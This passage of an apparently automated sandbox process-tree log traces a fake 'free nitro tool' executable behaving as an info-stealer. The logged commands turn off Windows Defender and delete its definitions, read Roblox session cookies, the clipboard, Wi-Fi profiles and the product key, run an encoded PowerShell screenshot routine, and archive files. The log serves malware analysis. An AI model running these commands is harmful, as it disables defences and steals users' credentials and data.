                                                                                            4⤵
                                                                                              PID:1464
                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                taskkill /F /PID 4428
                                                                                                5⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:5100
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2900"
                                                                                              4⤵
                                                                                                PID:4488
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:2500
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /PID 2900
                                                                                                    5⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:5316
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1312"
                                                                                                  4⤵
                                                                                                    PID:5364
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      taskkill /F /PID 1312
                                                                                                      5⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:5440
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3652"
                                                                                                    4⤵
                                                                                                      PID:5424
                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                        taskkill /F /PID 3652
                                                                                                        5⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5484
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2780"
                                                                                                      4⤵
                                                                                                        PID:5504
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          taskkill /F /PID 2780
                                                                                                          5⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:1384
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2216"
                                                                                                        4⤵
                                                                                                          PID:2888
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            taskkill /F /PID 2216
                                                                                                            5⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:5588
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                          4⤵
                                                                                                            PID:5468
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                              5⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:3740
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                            4⤵
                                                                                                              PID:5712
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                5⤵
                                                                                                                  PID:2880
                                                                                                                • C:\Windows\system32\getmac.exe
                                                                                                                  getmac
                                                                                                                  5⤵
                                                                                                                    PID:5764
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                  4⤵
                                                                                                                    PID:2452
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                      5⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:5868
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20722\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\1GnzD.zip" *"
                                                                                                                    4⤵
                                                                                                                      PID:5924
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI20722\rar.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI20722\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\1GnzD.zip" *
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:1088
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                      4⤵
                                                                                                                        PID:3132
                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                          wmic os get Caption
                                                                                                                          5⤵
                                                                                                                            PID:2764
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                          4⤵
                                                                                                                            PID:5132
                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                              wmic computersystem get totalphysicalmemory
                                                                                                                              5⤵
                                                                                                                                PID:5292
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                              4⤵
                                                                                                                                PID:524
                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                  wmic csproduct get uuid
                                                                                                                                  5⤵
                                                                                                                                    PID:404
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                  4⤵
                                                                                                                                    PID:3368
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                      5⤵
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:4676
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                    4⤵
                                                                                                                                      PID:4988
                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                        wmic path win32_VideoController get name
                                                                                                                                        5⤵
                                                                                                                                        • Detects videocard installed
                                                                                                                                        PID:1400
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                      4⤵
                                                                                                                                        PID:4548
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                          5⤵
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:2156
                                                                                                                                • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                                                  1⤵
                                                                                                                                    PID:2160
                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:4100
                                                                                                                                    • C:\Users\Admin\Downloads\freenitrotool.exe
                                                                                                                                      "C:\Users\Admin\Downloads\freenitrotool.exe"
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1740
                                                                                                                                      • C:\Users\Admin\Downloads\freenitrotool.exe
                                                                                                                                        "C:\Users\Admin\Downloads\freenitrotool.exe"
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:3992
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\freenitrotool.exe'"
                                                                                                                                          3⤵
                                                                                                                                            PID:5444
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\freenitrotool.exe'
                                                                                                                                              4⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:5608
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                            3⤵
                                                                                                                                              PID:5320
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                4⤵
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:5548
                                                                                                                                              • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                4⤵
                                                                                                                                                • Deletes Windows Defender Definitions
                                                                                                                                                PID:5708
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                              3⤵
                                                                                                                                                PID:5428
                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                  tasklist /FO LIST
                                                                                                                                                  4⤵
                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                  PID:4372
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                3⤵
                                                                                                                                                  PID:5544
                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5368
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2436
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell Get-Clipboard
                                                                                                                                                        4⤵
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:1800
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5700
                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                          tasklist /FO LIST
                                                                                                                                                          4⤵
                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                          PID:5904
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5684
                                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                                            tree /A /F
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2272
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5804
                                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                                netsh wlan show profile
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2896
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:5796
                                                                                                                                                                  • C:\Windows\system32\systeminfo.exe
                                                                                                                                                                    systeminfo
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Gathers system information
                                                                                                                                                                    PID:4556
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4152
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:404
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4h2ivq01\4h2ivq01.cmdline"
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:2680
                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3285.tmp" "c:\Users\Admin\AppData\Local\Temp\4h2ivq01\CSC95A076478B9F47C59218A1E049554AB9.TMP"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:596
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4004
                                                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                                                            tree /A /F
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1308
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:348
                                                                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                                                                tree /A /F
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3664
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3856
                                                                                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                                                                                    tree /A /F
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1636
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:164
                                                                                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                                                                                        tree /A /F
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:5268
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5392
                                                                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                                                                            tree /A /F
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:3544
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
